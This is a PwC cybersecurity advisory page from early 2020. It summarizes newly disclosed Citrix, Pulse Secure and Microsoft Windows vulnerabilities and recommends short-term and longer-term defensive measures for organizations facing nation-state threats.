The first 2020 challenges for cyber professionals: three new vulnerabilities and rising nation-state threats

Start adding items to your reading lists:
or
Save this item to:
This item has been saved to your reading list.

Just a few days into 2020, CISOs were already facing an uncommon test of resilience. Makers of three widely used technology products disclosed remote-code-execution vulnerabilities that could affect billions of users. 

Responding quickly and effectively to these threats is urgent for protecting critical business services and infrastructures. Now is also the time to strengthen your defenses and test your digital and operational resilience for what promises to be the most challenging decade yet for cybersecurity. 

Responding quickly and effectively to these threats is urgent for protecting critical business services and infrastructures.

Three new vulnerabilities to address ASAP

Citrix, Pulse Secure and Microsoft have all disclosed vulnerabilities that could allow attackers remote access to users’ systems, networks and data. Hackers treat announced vulnerabilities as open invitations to exploit susceptible systems, sometimes within hours of first notification. Anyone using these products should address these vulnerabilities immediately.

Citrix Application Delivery Controller and Citrix Gateway

CVE-2019-19781

Citrix provides one of the most popular remote access technologies in use today. Many organizations use Citrix Application Delivery to provide access to remote employees and contractors. Enterprises using this technology should take immediate action.

According to Citrix, a vulnerability in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, could, if exploited, allow an unauthenticated attacker to perform arbitrary code execution. Several proof-of-concept examples have been published online that could be used by malicious actors to exploit this vulnerability.

Citrix strongly urges affected customers to immediately apply the provided mitigation. A patch is forthcoming.

View more

Pulse Secure

CVE-2019-11510

Pulse Secure VPN is one of the most widely used tools allowing employees to securely access their corporate networks. The recently disclosed vulnerability allows an unauthenticated hacker to download an arbitrary file from a vulnerable Pulse Secure server. Organizations should upgradePulse Connect Secure and Pulse Policy Secure server software to the latest versions, which address the vulnerability. 

View more

Microsoft Windows

CVE-2020-0601

Windows 10, Windows Server 2016, 2019

Nearly 1 billion devices worldwide are said to run Windows 10 or Windows Server operating systems—and all these devices could be vulnerable to malicious activity, putting their systems and information at risk. Microsoft and the US National Security Agency announced on 14 January that there are vulnerabilities in Windows 10 and Windows Server 2016 and 2019, recommending that all devices using these products be patched as soon as possible.

According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.”

This security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates.

 

CVE-2020-0609/CVE-2020-0610

Microsoft Windows Remote Desktop Gateway

According to Microsoft, “A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”

  • Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020);
  • Occurs pre-authentication; and
  • Requires no user interaction to perform.

This update addresses the CVE-2020-0609 vulnerability while this update addresses the CVE-2020-0610 vulnerability, by correcting how RD Gateway handles connection requests.

 

CVE-2020-0611

Windows Remote Desktop Client

According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.”

Exploit of CVE-2020-0611 requires the attacker to have control of a server and then convince a user to connect to a malicious server via social engineering, DNS poisoning, a man-in-the-middle attack or by the attacker’s compromising a legitimate server.

This security update addresses the vulnerability by correcting how the Windows Remote Desktop Client handles connection requests.

View more

Guard against exploitation of these vulnerabilities amid fresh geopolitical tensions

Rising geopolitical tensions and the 2020 US elections could affect the exploitation of these vulnerabilities. Earlier in January, we published guidance following an alert from US-CERT on the potential for a cyber response to recent geopolitical events. Organizations concerned about being affected by this should understand the actors likely to be involved and the company’s potential vulnerability to the types of attacks these actors are likely to carry out. They should then rapidly mobilize targeted activities to shore up relevant security capabilities.

What you should do to address these vulnerabilities

Short-term actions

  1. Re-engage with your executive business leadership.
    Provide this key message: Threats are coming more quickly than ever. We're monitoring the situation and have a plan to address it.
  2. Understand and re-assess your organization's unique threat profile.
    • Are you more likely to be targeted by nation-state actors because you are part of US critical infrastructure or somehow connected to national interests?
    • Which of the vulnerable technologies described above do you use?
    • Do you have other known vulnerabilities that you haven’t addressed?
  3. Adopt a state of heightened awareness.
    Minimize coverage gaps in your personnel availability, consume relevant threat intelligence such as Cybersecurity and Infrastructure Security Agency (CISA) alerts promptly and consistently and update your emergency call trees.
  4. Increase organizational vigilance. Ensure information security personnel are monitoring key internal security capabilities and that they know how to identify anomalous behavior. Flag any known Iranian indicators of compromise and tactics, techniques and procedures for immediate response.
  5. Organize a “swat team.” The team’s mission is to deploy patches and interim mitigations such as updating detection tools and techniques used by the attackers. Your team can do this by writing custom detection use cases and rules based upon the advisories listed above.

Longer-term considerations

  1. Know your assets, interdependencies and critical functions. Step one in building resilience against operational and IT disruptions is to have real-time visibility into your assets, interdependencies and critical functions. Position your organization to catch potential disruptions before they happen.
  2. Implement defense in depth, with an emphasis on shoring up these capabilities:
    • Prevent malicious files from being delivered via phishing emails by restricting the file types permitted by email and web filtering tools
    • Restrict what can be executed on workstations, including scripts (e.g., PowerShell, HTA and CHM files) and untrusted macros in Microsoft Office files
    • Prevent the abuse of compromised credentials by deploying multi-factor authentication on all externally accessible services, critical internal services and services used by managed service providers to access internal systems
    • Protect domain admin accounts by onboarding them onto privileged access management solutions and limiting their use
    • Limit the ability of attackers to gain administrative access to systems by restricting membership of local admin groups and setting unique random passwords on default local admin accounts
    • Protect (typically highly privileged) service accounts by ensuring these have strong passwords and are prevented from logging in interactively
    • Limit attackers’ ability to access sensitive data by restricting access to open network shares and other potentially sensitive data stores (e.g., intranet, internal wikis and file servers)
    • Improve detection of and response to attacker activity by deploying additional security tools such as endpoint detection and response technology and anti-virus products with support for the Windows Anti-Malware Scan Interface
  3. Continue to enhance patch and vulnerability management processes.
    Make sure you are having discussions with leadership and with partners and suppliers. The case of vulnerabilities in medical devices, for example, points to the shortsightedness of dealing with vulnerability management as an IT problem alone.
  4. Engage in industry collaboration and information sharing.
  5. Be ready with response and recovery plans. Use these new 2020 challenges as an occasion to double down on building resilience into your organization.

This is a time to shore up cyber practices in your organization and aim to apply leading practices which PwC has been studying, advising on and fostering. Our Digital Trust Insights 2019 series is a survey-based study of the practices of companies that are business-driven in their cybersecurity strategy, that plan for resilience by design and weave data privacy into the fabric of the organization.

Contact us

Sean Joyce

Global and US Cybersecurity, Privacy & Forensics Leader, PwC US

Joseph Nocera

Cyber & Privacy Innovation Institute Leader, PwC US

Gerasimos J. Stellatos

Principal, Cybersecurity and Privacy, PwC US

Chris Morris

Principal, Cybersecurity and Privacy, PwC US

Follow us

Required fields are marked with an asterisk(*)

How can we help you?*

Check all that apply

By submitting your email address, you acknowledge that you have read the Privacy Statement and that you consent to our processing data in accordance with the Privacy Statement (including international transfers). If you change your mind at any time about wishing to receive the information from us, you can send us an email message using the Contact Us page.

Hide